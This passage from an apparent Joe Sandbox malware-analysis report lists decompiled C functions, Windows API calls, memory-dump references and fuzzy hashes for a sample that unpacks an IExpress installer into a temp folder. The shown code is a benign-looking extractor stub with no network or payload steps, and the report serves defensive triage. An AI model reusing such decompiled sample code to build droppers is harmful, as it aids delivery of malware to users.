                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00E730B4), ref: 00E74189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00E730B4), ref: 00E741E7
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: d343a7f9aca91c7169229b822cae8ed96e6860eda8c64c2fd31babcf6693639d
                                                                                                                                                                                                      • Instruction ID: f738c007b3cd7b29454bba884abc85d94bad929fc2fd924828fc3df5e96b06b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d343a7f9aca91c7169229b822cae8ed96e6860eda8c64c2fd31babcf6693639d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8201A9E13012243FF3246A6A5C86FBB218EDBD5799F45D029B70EF21C0ABA8CC4151B5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E00E743D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe79a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00e719e0
                                                                                                                                                                                                      0x00e719e0
                                                                                                                                                                                                      0x00e719eb
                                                                                                                                                                                                      0x00e719f2
                                                                                                                                                                                                      0x00e719f9
                                                                                                                                                                                                      0x00e719fc
                                                                                                                                                                                                      0x00e71a01
                                                                                                                                                                                                      0x00e71a2a
                                                                                                                                                                                                      0x00e71a2e
                                                                                                                                                                                                      0x00e71a3e
                                                                                                                                                                                                      0x00e71a4f
                                                                                                                                                                                                      0x00e71a62
                                                                                                                                                                                                      0x00e71a6a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71a03
                                                                                                                                                                                                      0x00e71a06
                                                                                                                                                                                                      0x00e71a20
                                                                                                                                                                                                      0x00e71a20
                                                                                                                                                                                                      0x00e71a08
                                                                                                                                                                                                      0x00e71a08
                                                                                                                                                                                                      0x00e71a14
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71a16
                                                                                                                                                                                                      0x00e71a18
                                                                                                                                                                                                      0x00e71a70
                                                                                                                                                                                                      0x00e71a72
                                                                                                                                                                                                      0x00e71a72
                                                                                                                                                                                                      0x00e71a14
                                                                                                                                                                                                      0x00e71a06
                                                                                                                                                                                                      0x00e71a81

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E71A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E71A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00E71A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00E71A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 00E71A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 10941717e5f41b1c8869d6cad2e775b6a6c609b688eb237061621e59d22fbac4
                                                                                                                                                                                                      • Instruction ID: 0b6b0a6e976db08ea154c41eb9915ea5fc40c92744d90fe556ad333be8279556
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10941717e5f41b1c8869d6cad2e775b6a6c609b688eb237061621e59d22fbac4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5911C871501219AFEB10EF68DD08AAE77B8EF89301F5081A4F51EF7191DB309E45CB96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E00E763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E00E71781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      				E00E7658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xe79124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xe79124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x00e763cb
                                                                                                                                                                                                      0x00e763d2
                                                                                                                                                                                                      0x00e763d8
                                                                                                                                                                                                      0x00e763ea
                                                                                                                                                                                                      0x00e763f3
                                                                                                                                                                                                      0x00e76401
                                                                                                                                                                                                      0x00e76402
                                                                                                                                                                                                      0x00e76410
                                                                                                                                                                                                      0x00e76415
                                                                                                                                                                                                      0x00e76433
                                                                                                                                                                                                      0x00e76438
                                                                                                                                                                                                      0x00e76449
                                                                                                                                                                                                      0x00e76463
                                                                                                                                                                                                      0x00e7646d
                                                                                                                                                                                                      0x00e76477
                                                                                                                                                                                                      0x00e76477
                                                                                                                                                                                                      0x00e7647a
                                                                                                                                                                                                      0x00e7643a
                                                                                                                                                                                                      0x00e7643a
                                                                                                                                                                                                      0x00e76444
                                                                                                                                                                                                      0x00e76444
                                                                                                                                                                                                      0x00e76492

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E763EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-1193786559
                                                                                                                                                                                                      • Opcode ID: b8c515bc8d824a79f6c64d13be22f5739394bfcf61d82463d58d73ac052f9ac1
                                                                                                                                                                                                      • Instruction ID: 97caaa67aff4c6b320d279d5e3f90bf0108472e428058823167ab01145ec0bb6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8c515bc8d824a79f6c64d13be22f5739394bfcf61d82463d58d73ac052f9ac1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721D571A00219AFDB10DF25DC85FEB77B8EB85318F0081A9F599B3180DAB05DC98F64
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E747E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E00E71680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0xe791e0; // 0x8f8208
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xe791e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					E00E744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xe78584; // 0x0
                                                                                                                                                                                                      				E00E744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x00e747e8
                                                                                                                                                                                                      0x00e747f0
                                                                                                                                                                                                      0x00e747f4
                                                                                                                                                                                                      0x00e7480f
                                                                                                                                                                                                      0x00e74811
                                                                                                                                                                                                      0x00e74814
                                                                                                                                                                                                      0x00e74814
                                                                                                                                                                                                      0x00e74816
                                                                                                                                                                                                      0x00e74817
                                                                                                                                                                                                      0x00e74829
                                                                                                                                                                                                      0x00e7482b
                                                                                                                                                                                                      0x00e7482f
                                                                                                                                                                                                      0x00e7484f
                                                                                                                                                                                                      0x00e74852
                                                                                                                                                                                                      0x00e74855
                                                                                                                                                                                                      0x00e74855
                                                                                                                                                                                                      0x00e74857
                                                                                                                                                                                                      0x00e74858
                                                                                                                                                                                                      0x00e74860
                                                                                                                                                                                                      0x00e74865
                                                                                                                                                                                                      0x00e7486a
                                                                                                                                                                                                      0x00e7486f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74876
                                                                                                                                                                                                      0x00e74831
                                                                                                                                                                                                      0x00e74841
                                                                                                                                                                                                      0x00e74847
                                                                                                                                                                                                      0x00e7480b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7480b
                                                                                                                                                                                                      0x00e747f6
                                                                                                                                                                                                      0x00e74806
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00E74E6F), ref: 00E747EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00E74823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00E74847
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E74851
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-1193786559
                                                                                                                                                                                                      • Opcode ID: 5dcc1469b5d377e66cf9e22ca95a74d2cdf6fb39b1f6142bb4dffe2169b153ab
                                                                                                                                                                                                      • Instruction ID: e66d333d59b6a40a28b31a945b4bfbda3c492b3544ce5f76e1d640528bc2146d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcc1469b5d377e66cf9e22ca95a74d2cdf6fb39b1f6142bb4dffe2169b153ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F81106F52046416FE719DF34AC18F763B9AEBC5300B04D519F94AF7381DB358C0A8660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00e7368c
                                                                                                                                                                                                      0x00e7368f
                                                                                                                                                                                                      0x00e73691
                                                                                                                                                                                                      0x00e7369f
                                                                                                                                                                                                      0x00e736a7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e736ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e736bc
                                                                                                                                                                                                      0x00e736bc
                                                                                                                                                                                                      0x00e736c0
                                                                                                                                                                                                      0x00e736cb
                                                                                                                                                                                                      0x00e736c2
                                                                                                                                                                                                      0x00e736c4
                                                                                                                                                                                                      0x00e736c4
                                                                                                                                                                                                      0x00e736da
                                                                                                                                                                                                      0x00e736e0
                                                                                                                                                                                                      0x00e736e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e736e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e736ba
                                                                                                                                                                                                      0x00e736ed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E7369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00E736CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: 7928e0fbedaba6cc8d156aea1f4aea9e8b1804c2e6c3bcbd4bc27a26f2eb76dc
                                                                                                                                                                                                      • Instruction ID: 824e8a8871ce6e9e5f6914fa8149e39ea1c3c22fd00dafbffdab1ff19ac0d28f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7928e0fbedaba6cc8d156aea1f4aea9e8b1804c2e6c3bcbd4bc27a26f2eb76dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F0184B29012557BDB30CAF75C48EEF767CEBC5B11F14412DB909F2180D660C644D661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E00E765E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x00e765e8
                                                                                                                                                                                                      0x00e765ed
                                                                                                                                                                                                      0x00e765ef
                                                                                                                                                                                                      0x00e765f2
                                                                                                                                                                                                      0x00e765f4
                                                                                                                                                                                                      0x00e765f4
                                                                                                                                                                                                      0x00e765f6
                                                                                                                                                                                                      0x00e765f7
                                                                                                                                                                                                      0x00e76608
                                                                                                                                                                                                      0x00e76611
                                                                                                                                                                                                      0x00e76618
                                                                                                                                                                                                      0x00e7661c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7660e
                                                                                                                                                                                                      0x00e76623
                                                                                                                                                                                                      0x00e76625
                                                                                                                                                                                                      0x00e7663b
                                                                                                                                                                                                      0x00e7663b
                                                                                                                                                                                                      0x00e7663d
                                                                                                                                                                                                      0x00e76641
                                                                                                                                                                                                      0x00e76610
                                                                                                                                                                                                      0x00e76610
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76610
                                                                                                                                                                                                      0x00e76644
                                                                                                                                                                                                      0x00e76647
                                                                                                                                                                                                      0x00e76647
                                                                                                                                                                                                      0x00e76621
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00E72B33), ref: 00E76602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00E76612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00E76629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00E76635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: 3d5f00f28a266af7373e8d2531cf8af31c42874ddd1c5ba64d967d3ac4ad0f99
